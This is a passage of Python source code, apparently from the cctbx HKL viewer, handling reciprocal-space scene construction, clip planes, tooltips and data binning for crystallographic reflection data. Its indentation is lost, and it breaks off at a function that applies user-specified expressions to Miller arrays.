and has_phil_path(diff_phil,
"show_missing",
"show_only_missing",
"show_systematic_absences",
"slice_axis",
"slice_mode",
"slice_index",
"sigma_color_radius",
"scene_id",
"color_scheme",
"color_powscale",
"scale",
"nth_power_scale_radii"
) \
or self.viewerparams.inbrowser==False and \
( has_phil_path(diff_phil,
"expand_anomalous",
"expand_to_p1",
"show_anomalous_pairs")
):
self.sceneisdirty = True
if has_phil_path(diff_phil,
"spacegroup_choice",
"show_missing",
"show_only_missing",
"show_systematic_absences",
"slice_axis",
"slice_mode",
"slice_index",
"sigma_color_radius",
"scene_id",
"use_provided_miller_arrays",
"color_scheme",
"color_powscale",
"scale",
"nth_power_scale_radii"
):
self.ConstructReciprocalSpace(curphilparam, scene_id=self.viewerparams.scene_id )
else:
self.ConstructReciprocalSpace(curphilparam )
msg = ""
if self.viewerparams.scene_id is not None and \
( has_phil_path(diff_phil,
"show_missing",
"show_only_missing",
"show_systematic_absences",
"binner_idx",
"nbins",
)
) and not has_phil_path(diff_phil, "scene_bin_thresholds") :
self.binvals, self.nuniqueval = self.calc_bin_thresholds(curphilparam.binner_idx,
curphilparam.nbins)
self.sceneisdirty = True
if has_phil_path(diff_phil, "scene_bin_thresholds"):
self.sceneisdirty = True
if has_phil_path(diff_phil,
"color_scheme",
"color_powscale",
"scale",
"nth_power_scale_radii"
):
self.add_colour_map_radii_power_to_dict()
if has_phil_path(diff_phil, "camera_type"):
self.set_camera_type()
if has_phil_path(diff_phil, "show_hkl"):
self.show_hkl()
if has_phil_path(diff_phil, "show_tooltips"):
self.set_show_tooltips()
if has_phil_path(diff_phil, "tooltip_alpha"):
self.set_tooltip_opacity()
if has_phil_path(diff_phil, "show_symmetry_rotation_axes"):
self.show_rotation_axes()
if has_phil_path(diff_phil, "show_vector"):
self.show_vector()
if has_phil_path(diff_phil, "angle_around_vector"):
self.rotate_around_numbered_vector()
if has_phil_path(diff_phil, "angle_around_XHKL_vector"):
self.rotate_stage_around_cartesian_vector([1,0,0], self.viewerparams.angle_around_XHKL_vector)
self.viewerparams.angle_around_XHKL_vector = None
if has_phil_path(diff_phil, "angle_around_YHKL_vector"):
self.rotate_stage_around_cartesian_vector([0,1,0], self.viewerparams.angle_around_YHKL_vector)
self.viewerparams.angle_around_YHKL_vector = None
if has_phil_path(diff_phil, "angle_around_ZHKL_vector"):
self.rotate_stage_around_cartesian_vector([0,0,1], self.viewerparams.angle_around_ZHKL_vector)
self.viewerparams.angle_around_ZHKL_vector = None
if has_phil_path(diff_phil, "animate_rotation_around_vector"):
self.animate_rotate_around_vector()
if has_phil_path(diff_phil, "miller_array_operations"):
self.viewerparams.scene_id = len(self.hkl_scenes_infos)-1
self.viewerparams.sigma_color_radius = False
self.set_scene()
self.params.miller_array_operations = ""
if has_phil_path(diff_phil, "fixorientation", "slice_axis") and \
self.viewerparams.slice_mode and self.viewerparams.fixorientation == "reflection_slice":
# explicit slicing is not volatile
if self.viewerparams.slice_axis=="h": hkl = [1,0,0]
if self.viewerparams.slice_axis=="k": hkl = [0,1,0]
if self.viewerparams.slice_axis=="l": hkl = [0,0,1]
R = hkl[0] * self.normal_kl + hkl[1] * self.normal_lh - hkl[2] * self.normal_hk
self.orient_vector_to_screen(R[0])
if has_phil_path(diff_phil,
"spacegroup_choice",
"use_provided_miller_arrays",
"scene_bin_thresholds", # TODO: group bin phil parameters together in subscope
"bin_opacities",
"binner_idx",
"nbins",
"fontsize",
"miller_array_operations",
"mouse_sensitivity",
"real_space_unit_cell_scale_fraction",
"reciprocal_unit_cell_scale_fraction",
"clip_plane",
"viewer") and self.viewerparams.scene_id is not None:
# any change to parameters in the master phil in display2.py
self.scene = self.HKLscene_from_dict(self.viewerparams.scene_id)
self.DrawNGLJavaScript()
self.mprint( "Rendered %d reflections" % self.scene.points.size(), verbose=1)
self.set_volatile_params()
if self.viewerparams.scene_id is None:
self.DrawNGLJavaScript(blankscene=True)
return curphilparam
def set_volatile_params(self):
"""
Change the view of the reflections according to the current values of the volatile parameters.
Volatile parameters are those that do not require heavy computing (unlike the positions of WebGL
primitives) but can change the appearance of primitives instantly, such as opacity or clip plane
position. Expanding coordinates to P1 in the browser is also considered volatile as this
operation is very fast.
"""
if self.viewerparams.scene_id is not None:
if has_phil_path(self.diff_phil, "angle_around_vector"): # no need to redraw any clip plane
return
if self.viewerparams.fixorientation == "vector":
self.orient_vector_to_screen(self.currentrotvec)
self.SetMouseSpeed(self.ngl_settings.mouse_sensitivity)
hkldist = -1
clipwidth = None
self.fix_orientation()
uc = self.miller_array.unit_cell()
if self.params.clip_plane.clipwidth and not self.viewerparams.slice_mode:
clipwidth = self.params.clip_plane.clipwidth
hkldist = self.params.clip_plane.hkldist
msg = ""
if self.params.clip_plane.normal_vector != -1:
# cartvec is reciprocal vector in cartesian coordinates
cartvec = self.all_vectors[ self.params.clip_plane.normal_vector ][3]
# hklvec is the reciprocal vector in reciprocal coordinates.
# First see if it is stored in self.all_vectors[..][5].
# If not, convert the cartesian representation, cartvec,
# into reciprocal coordinates
try:
hklvec = eval(self.all_vectors[ self.params.clip_plane.normal_vector ][5])
except Exception as e:
hklvec = roundoff(list(matrix.sqr(uc.orthogonalization_matrix()).transpose() * cartvec/self.scene.renderscale))
# Get corresponding real space vector to the hkl vector (as cartesian coordinates)
real_space_vec = hklvec * matrix.sqr(uc.orthogonalization_matrix())
# In the general case real_space_vec is not parallel to hklvec
# Orient the clip plane perpendicular to real_space_vec while at the
# same time slide clip plane along the cartvec (reciprocal vector) direction
# in units of cartvec projected onto real_space_vec
self.mprint("clip plane perpendicular to hkl direction: %s" %str(hklvec))
self.orient_vector_to_screen(real_space_vec)
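# L is the length of cartvec; multiplied by the cosine of the angle between
# cartvec and real_space_vec, it converts hkldist steps along the reciprocal
# vector into a signed offset along the clip plane normal.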
L = math.sqrt( cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
if self.params.clip_plane.normal_vector_length_scale > 0:
L = self.params.clip_plane.normal_vector_length_scale
cosine, _, _ = self.project_vector1_vector2(cartvec, real_space_vec)
hkldist = -self.params.clip_plane.hkldist * L *cosine
msg = "Reflections satisfying: %s*h + %s*k + %s*l = %s" %(hklvec[0], hklvec[1], hklvec[2], self.params.clip_plane.hkldist)
self.AddToBrowserMsgQueue("PrintInformation", msg)
self.make_clip_plane(hkldist, clipwidth)
if self.viewerparams.inbrowser and not self.viewerparams.slice_mode:
self.ExpandInBrowser()
self.SetOpacities(self.ngl_settings.bin_opacities )
if self.params.real_space_unit_cell_scale_fraction is None:
scale = None
else:
scale = (self.realspace_scale - 1.0)*self.params.real_space_unit_cell_scale_fraction + 1.0
self.DrawUnitCell(scale )
if self.params.reciprocal_unit_cell_scale_fraction is None:
scale = None
else:
scale = (self.reciproc_scale - 1.0)*self.params.reciprocal_unit_cell_scale_fraction + 1.0
self.DrawReciprocalUnitCell(scale )
self.set_tooltip_opacity()
self.set_show_tooltips()
self.visualise_sym_HKLs()
def set_scene(self):
self.binvals = []
if self.viewerparams.scene_id is None:
return False
self.colour_scene_id = self.viewerparams.scene_id
self.radii_scene_id = self.viewerparams.scene_id
self.set_miller_array(self.viewerparams.scene_id)
if (self.miller_array is None):
raise Sorry("No data loaded!")
self.mprint( "Miller array %s runs from hkls: %s to %s" \
%(self.miller_array.info().label_string(), self.miller_array.index_span().min(),
self.miller_array.index_span().max() ) )
self.mprint("Spacegroup: %s" %self.miller_array.space_group().info().symbol_and_number())
return True
def set_miller_array(self, scene_id=None, merge=None, details=""):
if scene_id is not None:
self.viewerparams.scene_id = scene_id
if self.viewerparams and self.viewerparams.scene_id is not None and self.viewerparams.scene_id >= 0 and self.HKLscene:
self.miller_array = self.HKLscene_from_dict(self.viewerparams.scene_id).miller_array
self.scene = self.HKLscene_from_dict(self.viewerparams.scene_id)
self.merge = merge
if (self.miller_array is None):
return
self.identify_suitable_fomsarrays()
self.GetUnitcellScales()
self.d_min = self.miller_array.d_min()
array_info = self.miller_array.info()
# capture the currently selected spacegroup if not the default
self.sg = self.proc_arrays[self.scene_id_to_array_id(self.viewerparams.scene_id)].space_group()
#self.sg = self.miller_array.space_group()
self.symops = list(self.sg.all_ops())
if len(self.binvals) == 0:
self.binvals = [ 1.0/self.miller_array.d_max_min()[0], 1.0/self.miller_array.d_max_min()[1] ]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
uc = "a=%g b=%g c=%g angles=%g,%g,%g" % self.miller_array.unit_cell().parameters()
self.mprint( "Data: %s %s, %d reflections in space group: %s, unit Cell: %s" \
% (array_info.label_string(), details, self.miller_array.indices().size(), \
self.miller_array.space_group_info(), uc), verbose=0 )
def Complex2AmplitudesPhases(self, data):
ampls = flex.abs(data)
phases = flex.arg(data) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
#b = flex.bool([bool(math.isnan(e)) for e in phases])
# replace the nan values with an arbitrary float value
#phases = phases.set_selected(b, 42.4242)
phases = graphics_utils.NoNansArray( phases, 42.4242)
# Cast negative degrees to equivalent positive degrees
phases = flex.fmod_positive(phases, 360.0)
return ampls, phases
def get_rothkl_from_IDs(self, id, sym_id, anomalous=False):
if bool(anomalous):
id = id % len(self.scene.indices)
hkl = self.scene.indices[id]
hklvec = flex.vec3_double( [(hkl[0], hkl[1], hkl[2])])
rotmx=None
if sym_id >= 0 and sym_id < len(self.symops):
# symid tells which symmetry operator was used in HKLJavaScripts.js onMessage() Expand()
rotmx = self.symops[sym_id].r()
Rhkl = hklvec[0]
if rotmx:
# if a symmetry mate was clicked then deduce its hkl coordinate by
# applying the rotation to the original hkl coordinate
Rhkl = hklvec[0] * rotmx
rothkl = Rhkl
if bool(anomalous):
rothkl = (-Rhkl[0], -Rhkl[1], -Rhkl[2])
return rothkl, hkl
def make_visual_symHKLs(self, id, sym_id, anomalous=False):
symid = sym_id
# if a user operator was added then iterate until we find it
#while self.currentsymop != self.symops[symid]:
# symid += 1
rothkl, dummy = self.get_rothkl_from_IDs(id, symid, anomalous) # and use it
if self.visual_symmxs:
# if a list of symmetry matrices have been deduced from a selected rotation operator
# then also compute the other symmetry mates of the current hkl
self.visual_symHKLs = []
for symmx,hklstr in self.visual_symmxs:
vissymrothkl = rothkl * symmx.transpose()
self.visual_symHKLs.append( (vissymrothkl, hklstr) )
def GetTooltipOnTheFly(self, id, sym_id, anomalous=False):
rothkl, hkl = self.get_rothkl_from_IDs(id, sym_id, anomalous)
spbufttip = '\'HKL: [%d,%d,%d]' %(rothkl[0], rothkl[1], rothkl[2])
if rothkl != hkl: # then show the original hkl before P1 or anomalous expansion
spbufttip += ', (asu): [%d,%d,%d]' %(hkl[0], hkl[1], hkl[2])
# resolution and Angstrom character for javascript
spbufttip += '\\ndres: %s \'+ String.fromCharCode(197) +\'' \
%str(roundoff(self.miller_array.unit_cell().d(hkl), 2) )
#for dummykey, (hklscene, maxdat,mindat,maxsig,minsig,info) in self.HKLscenedict.items():
for hklscene in self.HKLscenes:
sigvals = []
datvals = []
if hklscene.isUsingFOMs():
continue # already have tooltips for the scene without the associated fom
if hklscene.work_array.sigmas() is not None:
sigvals = list( hklscene.work_array.select(hklscene.work_array.indices() == hkl).sigmas() )
datval = None
if hkl in hklscene.work_array.indices():
datvals = list( hklscene.work_array.select(hklscene.work_array.indices() == hkl).data() )
else:
if id >= hklscene.data.size():
continue
for i,datval in enumerate(datvals):
if hklscene.work_array.is_hendrickson_lattman_array() and math.isnan(datval[0] + datval[1] + datval[2] + datval[3]):
continue
if not isinstance(datval, tuple) and (math.isnan( abs(datval) ) or datval == display.inanval):
continue
if hklscene.work_array.is_complex_array():
ampl = abs(datval)
phase = cmath.phase(datval) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
# and replace the nan values with an arbitrary float value
if math.isnan(phase):
phase = 42.4242
# Cast negative degrees to equivalent positive degrees
phase = phase % 360.0
spbufttip +="\\n" + hklscene.work_array.info().label_string() + ': '
if hklscene.work_array.is_complex_array():
spbufttip += str(roundoff(ampl, 2)) + ", " + str(roundoff(phase, 2)) + \
"\'+ String.fromCharCode(176) +\'" # degree character for javascript
elif sigvals:
sigma = sigvals[i]
spbufttip += str(roundoff(datval, 2)) + ", " + str(roundoff(sigma, 2))
else:
spbufttip += str(roundoff(datval, 2))
spbufttip += '\\n\\n%d,%d,%d' %(id, sym_id, anomalous) # compared by the javascript
spbufttip += '\''
return spbufttip
def get_col_fomcol(self, idx):
if len(self.HKLInfo_from_dict()) == 0:
return -1, -1
return self.HKLInfo_from_dict(idx)[6], self.HKLInfo_from_dict(idx)[7]
def SupersetMillerArrays(self, origindices):
self.match_valarrays = []
# First loop over all miller arrays to make a superset of hkls of all
# miller arrays. Then loop over all miller arrays and extend them with NaNs
# as to contain the same hkls as the superset
self.mprint("Gathering superset of miller indices...", verbose=1)
superset_array = self.proc_arrays[0].deep_copy()
#set_of_indices = set([])
#for i,procarray in enumerate(self.proc_arrays):
# set_of_indices |= set( list(procarray.indices()) )
#self.mprint("Extending miller arrays to match superset of miller indices...")
#indiceslst = flex.miller_index( list( set_of_indices ) )
indiceslst = origindices
for i,procarray in enumerate(self.proc_arrays):
# first match indices in currently selected miller array with indices in the other miller arrays
matchindices = miller.match_indices(indiceslst, procarray.indices() )
#matchindices = miller.match_indices( procarray.indices(), indiceslst )
valarray = procarray.select( matchindices.pairs().column(1) )
#if valarray.anomalous_flag() != superset_array.anomalous_flag():
# superset_array._anomalous_flag = valarray._anomalous_flag
#missing = indiceslst.lone_set( valarray.indices() )
#missing = indiceslst.select( miller.match_indices(valarray.indices(), indiceslst ).singles(1))
# insert NAN values for reflections in self.miller_array not found in procarray
#valarray = display.ExtendMillerArray(valarray, missing.size(), missing )
#match_valarray = valarray
#match_valindices = miller.match_indices(superset_array.indices(), valarray.indices() )
match_valindices = miller.match_indices(indiceslst, valarray.indices() )
match_valarray = valarray.select( match_valindices.pairs().column(1) )
#match_valarray.sort(by_value="packed_indices")
match_valarray.set_info(procarray.info() )
self.match_valarrays.append( match_valarray )
self.mprint("Done making superset", verbose=1)
"""
def SupersetMillerArrays(self):
self.match_valarrays = []
# First loop over all miller arrays to make a superset of hkls of all
# miller arrays. Then loop over all miller arrays and extend them with NaNs
# as to contain the same hkls as the superset
self.mprint("Gathering superset of miller indices...")
superset_array = self.proc_arrays[0].deep_copy()
for i,procarray in enumerate(self.proc_arrays):
if i==0:
continue
# first match indices in currently selected miller array with indices in the other miller arrays
matchindices = miller.match_indices(superset_array.indices(), procarray.indices() )
valarray = procarray.select( matchindices.pairs().column(1) )
if valarray.anomalous_flag() != superset_array.anomalous_flag():
superset_array._anomalous_flag = valarray._anomalous_flag
missing = procarray.lone_set( superset_array )
superset_array = display.ExtendMillerArray(superset_array, missing.size(), missing.indices())
self.mprint("Extending miller arrays to match superset of miller indices...")
for i,procarray in enumerate(self.proc_arrays):
# first match indices in currently selected miller array with indices in the other miller arrays
matchindices = miller.match_indices(superset_array.indices(), procarray.indices() )
valarray = procarray.select( matchindices.pairs().column(1) )
if valarray.anomalous_flag() != superset_array.anomalous_flag():
superset_array._anomalous_flag = valarray._anomalous_flag
missing = superset_array.lone_set( valarray )
# insert NAN values for reflections in self.miller_array not found in procarray
valarray = display.ExtendMillerArray(valarray, missing.size(), missing.indices())
match_valindices = miller.match_indices(superset_array.indices(), valarray.indices() )
match_valarray = valarray.select( match_valindices.pairs().column(1) )
match_valarray.sort(by_value="packed_indices")
match_valarray.set_info(procarray.info() )
self.match_valarrays.append( match_valarray )
self.mprint("Done making superset")
"""
def ConstructReciprocalSpace(self, curphilparam, scene_id=None):
sceneid = scene_id
if sceneid is None:
sceneid = self.viewerparams.scene_id
if len(self.proc_arrays) == 0:
return False
self.HKLsceneKey = (curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_color_radius,
self.viewerparams.color_scheme,
self.viewerparams.color_powscale,
sceneid,
self.viewerparams.scale,
str(self.viewerparams.nth_power_scale_radii)
)
if self.HKLsceneKey in self.HKLscenedict and not self.has_new_miller_array:
self.HKLscene = self.HKLscenedict.get(self.HKLsceneKey, False)
if self.HKLscene:
self.mprint("Using cached HKL scene", verbose=1)
return True
if self.has_new_miller_array:
self.identify_suitable_fomsarrays()
self.mprint("Constructing HKL scenes", verbose=0)
if scene_id is None:
hkl_scenes_infos = []
self.HKLscenes = []
sceneid = 0
for (idx, arr) in enumerate(self.proc_arrays):
(hklscenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = MakeHKLscene( arr.deep_copy(), idx, copy.deepcopy(self.viewerparams), self.mapcoef_fom_dict, None, self.mprint )
if len(scenearrayinfos) == 0: # arr does not have valid data
sceneid += 1 # still advance the count so scene ids stay aligned with the arrays
for i,inf in enumerate(scenearrayinfos):
self.mprint("%d, %s" %(idx+i+1, inf[0]), verbose=1)
self.HKLsceneKey = (curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_color_radius,
self.viewerparams.color_scheme,
self.viewerparams.color_powscale,
sceneid,
self.viewerparams.scale,
str(self.viewerparams.nth_power_scale_radii)
)
self.HKLscenedict[self.HKLsceneKey] = ( hklscenes[i], scenemaxdata[i],
scenemindata[i], scenemaxsigmas[i], sceneminsigmas[i], inf )
hkl_scenes_infos.append(inf + [sceneid])
self.HKLscenes.append(hklscenes[i])
sceneid += 1
self.hkl_scenes_infos = hkl_scenes_infos
if self.viewerparams.scene_id is not None:
self.HKLsceneKey = (curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_color_radius,
self.viewerparams.color_scheme,
self.viewerparams.color_powscale,
self.viewerparams.scene_id,
self.viewerparams.scale,
str(self.viewerparams.nth_power_scale_radii)
)
scenearraylabeltypes = [ (e[3], e[4], e[1], e[5], e[6]) for e in hkl_scenes_infos ]
self.SendInfoToGUI({ "scene_array_label_types": scenearraylabeltypes, "NewHKLscenes" : True })
self.bin_labels_type_idxs = []
self.bin_labels_type_idxs.append(("Resolution", "", -1 ))
self.bin_labels_type_idxs.append(("Singletons", "", -1 ))
for label,labeltype,idx,hassigmas,sceneid in scenearraylabeltypes:
if labeltype not in ["Map coeffs", "Map coeffs_fom", "HL coeffs"]:
self.bin_labels_type_idxs.append((label, labeltype, sceneid))
if hassigmas:
self.bin_labels_type_idxs.append(("Sigmas of " + label, "hassigmas", sceneid))
if labeltype == "Map coeffs":
self.bin_labels_type_idxs.append(("Phases of " + label, labeltype, sceneid))
self.bin_labels_type_idxs.append(("Amplitudes of " + label, labeltype, sceneid))
self.SendInfoToGUI({ "bin_labels_type_idxs": self.bin_labels_type_idxs})
self.get_labels_of_data_for_binning()
else:
idx = self.scene_id_to_array_id(scene_id)
(hklscenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = MakeHKLscene( self.proc_arrays[idx].deep_copy(), idx, copy.deepcopy(self.viewerparams), self.mapcoef_fom_dict, None, self.mprint )
for i,inf in enumerate(scenearrayinfos):
self.mprint("%d, %s" %(idx+i+1, inf[0]), verbose=1)
self.HKLsceneKey = (curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_color_radius,
self.viewerparams.color_scheme,
self.viewerparams.color_powscale,
sceneid,
self.viewerparams.scale,
str(self.viewerparams.nth_power_scale_radii)
)
self.HKLscenedict[self.HKLsceneKey] = ( hklscenes[i], scenemaxdata[i],
scenemindata[i], scenemaxsigmas[i], sceneminsigmas[i], inf )
sceneid += 1
(
self.HKLscene,
self.HKLscenesMaxdata,
self.HKLscenesMindata,
self.HKLscenesMaxsigmas,
self.HKLscenesMinsigmas,
self.hkl_scenes_info
) = self.HKLscenedict[self.HKLsceneKey]
self.sceneisdirty = True
self.has_new_miller_array = False
return True
def Sceneid_to_SceneKey(self, sceneid):
return (self.params.spacegroup_choice,
self.params.using_space_subgroup,
self.params.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_color_radius,
self.viewerparams.color_scheme,
self.viewerparams.color_powscale,
sceneid,
self.viewerparams.scale,
str(self.viewerparams.nth_power_scale_radii)
)
def HKLscene_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][0]
def HKLMaxData_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][1]
def HKLMinData_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][2]
def HKLMaxSigmas_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][3]
def HKLMinSigmas_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][4]
def HKLInfo_from_dict(self, sceneid=None):
if sceneid is None:
sceneid = self.viewerparams.scene_id
HKLsceneKey = self.Sceneid_to_SceneKey(sceneid)
if not self.HKLscenedict.get(HKLsceneKey, False):
self.ConstructReciprocalSpace(self.params, scene_id=sceneid)
return self.HKLscenedict[HKLsceneKey][5]
def identify_suitable_fomsarrays(self):
self.mprint("Matching complex arrays to suitable FOM arrays", verbose=1)
self.mapcoef_fom_dict = {}
self.sceneid_from_arrayid = []
for k,proc_array in enumerate(self.proc_arrays):
#if not proc_array.is_complex_array() or not proc_array.is_real_array():
# continue
fom_arrays_idx = []
array_scene_ids = [(k,k)]
for i,foms_array in enumerate(self.proc_arrays):
if not proc_array.is_complex_array() or not foms_array.is_real_array():
continue
if proc_array.size() != foms_array.size():
continue
if flex.min(foms_array.data()) < 0.0 or flex.max(foms_array.data()) > 1.0:
continue
fom_arrays_idx.append( (foms_array, i) )
array_scene_ids.append((k,i))
self.sceneid_from_arrayid.extend( array_scene_ids)
self.mapcoef_fom_dict[proc_array.info().label_string()] = fom_arrays_idx
def scene_id_to_array_id(self, scene_id):
for i,array_scene_id in enumerate(self.sceneid_from_arrayid):
if scene_id == i:
return array_scene_id[0]
raise Sorry("scene_id, %d, is out of range" %scene_id)
def calc_bin_thresholds(self, binner_idx, nbins):
# make default bin thresholds if scene_bin_thresholds is not set
binscenelabel = self.bin_labels_type_idxs[binner_idx][0]
self.mprint("Using %s for binning" %binscenelabel)
if binscenelabel=="Resolution":
hklscene = self.HKLscene_from_dict(int(self.viewerparams.scene_id))
warray = hklscene.work_array
dres = hklscene.dres
uc = warray.unit_cell()
indices = hklscene.indices
dmax,dmin = warray.d_max_min(d_max_is_highest_defined_if_infinite=True) # to avoid any F000 reflection
if dmax == dmin: # e.g. if only one reflection
binvals = [dres[0]-0.1, dmin +0.1]
nuniquevalues = 2
else: # use generic binning function from cctbx
binning = miller.binning( uc, nbins, indices, dmax, dmin )
binvals = [ binning.bin_d_range(n)[0] for n in binning.range_all() ]
binvals = [ e for e in binvals if e != -1.0] # delete dummy limit
binvals = list( 1.0/flex.double(binvals) )
nuniquevalues = len(set(list(dres)))
elif binscenelabel=="Singletons":
binvals = [ -1.5, -0.5, 0.5, 1.5 ]
nuniquevalues = len(binvals)
else:
bindata, dummy = self.get_matched_binarray(binner_idx)
selection = flex.sort_permutation( bindata )
bindata_sorted = bindata.select(selection)
# get binvals by dividing bindata_sorted into nbins equally populated intervals
binvals = [bindata_sorted[0]] * nbins
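# For instance, with 100 sorted values and nbins = 4 the loop below ends up
# keeping the largest value of each quartile, i.e. roughly the 25th, 50th,
# 75th and 100th percentiles, as the bin thresholds.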
for i,e in enumerate(bindata_sorted):
idiv = int(nbins*float(i)/len(bindata_sorted))
binvals[idiv] = e
nuniquevalues = len(set(list(bindata)))
binvals.sort()
self.mprint("Bin thresholds are:\n" + str(binvals))
return binvals, nuniquevalues
def UpdateBinValues(self, binner_idx, binvals = [], nuniquevalues = -1):
if binvals:
binvals.sort()
self.binvals = binvals
else: # ensure default resolution interval includes all data by avoiding rounding errors
self.binvals = [ 1.0/(self.miller_array.d_max_min()[0]*1.001),
1.0/(self.miller_array.d_max_min()[1]*0.999) ]
if nuniquevalues == -1:
if binner_idx==0:
nuniquevalues = len(set(list( self.HKLscene_from_dict(int(self.viewerparams.scene_id)).dres )))
else:
bindata, dummy = self.get_matched_binarray(binner_idx)
nuniquevalues = len(set(list(bindata)))
self.nuniqueval = nuniquevalues
def get_matched_binarray(self, binner_idx):
binscenelabel, datatype, sceneid = self.bin_labels_type_idxs[binner_idx]
label = self.HKLscene_from_dict(sceneid).work_array.info().label_string()
if datatype == "hassigmas" and binscenelabel == "Sigmas of " + label:
bindata = self.HKLscene_from_dict(sceneid).sigmas.deep_copy()
binvalsboundaries = [ self.HKLMinSigmas_from_dict(sceneid) - 0.1 , self.HKLMaxSigmas_from_dict(sceneid) + 0.1 ]
elif datatype in "Map coeffs" and "Phases of " + label in binscenelabel:
bindata = self.HKLscene_from_dict(sceneid).phases.deep_copy()
# preselect centric reflections, i.e. those with phi = 0 or 180
binvalsboundaries = [-0.01, 0.01, 179.99, 180.01, 359.99, 360]
elif datatype in "Map coeffs" and "Amplitudes of " + label in binscenelabel:
bindata = self.HKLscene_from_dict(sceneid).ampl.deep_copy()
binvalsboundaries = [ self.HKLMinData_from_dict(sceneid) - 0.1 , self.HKLMaxData_from_dict(sceneid) + 0.1 ]
else:
bindata = self.HKLscene_from_dict(sceneid).data.deep_copy()
binvalsboundaries = [ self.HKLMinData_from_dict(sceneid) - 0.1 , self.HKLMaxData_from_dict(sceneid) + 0.1 ]
return bindata, binvalsboundaries
def MatchBinArrayToSceneArray(self):
# match bindata with data or sigmas
if self.bin_labels_type_idxs[self.params.binner_idx][0] == "Resolution":
return 1.0/self.scene.dres
binarraydata, dummy = self.get_matched_binarray(self.params.binner_idx)
scenearraydata = self.HKLscene_from_dict(self.viewerparams.scene_id).data
ibinarray = self.bin_labels_type_idxs[self.params.binner_idx][2]
matchindices = miller.match_indices(self.HKLscene_from_dict(self.viewerparams.scene_id).indices,
self.HKLscene_from_dict(ibinarray).indices )
matched_binarray = binarraydata.select( matchindices.pairs().column(1) )
#valarray.sort(by_value="packed_indices")
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#missing = scenearraydata.lone_set( valarray )
# insert NAN values for reflections in self.miller_array not found in binarray
#valarray = display.ExtendMillerArray(valarray, missing.size(), missing.indices() )
#match_valindices = miller.match_indices(scenearray.indices(), valarray.indices() )
#match_valarray = valarray.select( match_valindices.pairs().column(1) )
#match_valarray.sort(by_value="packed_indices")
#match_valarray.set_info(binarraydata.info() )
# patch the bin array so its sequence matches the scene array
patched_binarraydata = []
c = 0
for b in matchindices.pair_selection(0):
if b:
patched_binarraydata.append(matched_binarray[c])
c +=1
else:
patched_binarraydata.append(float("nan"))
return flex.double(patched_binarraydata)
def OperateOn1MillerArray(self, millarr, operation):
# lets the user specify a Python expression operating on millarr
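# A hypothetical example (assuming a cctbx-style miller array): passing
# operation = "newarray = array1.customized_copy(data=array1.data()*2.0)"
# would yield a copy of millarr with all data values doubled.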
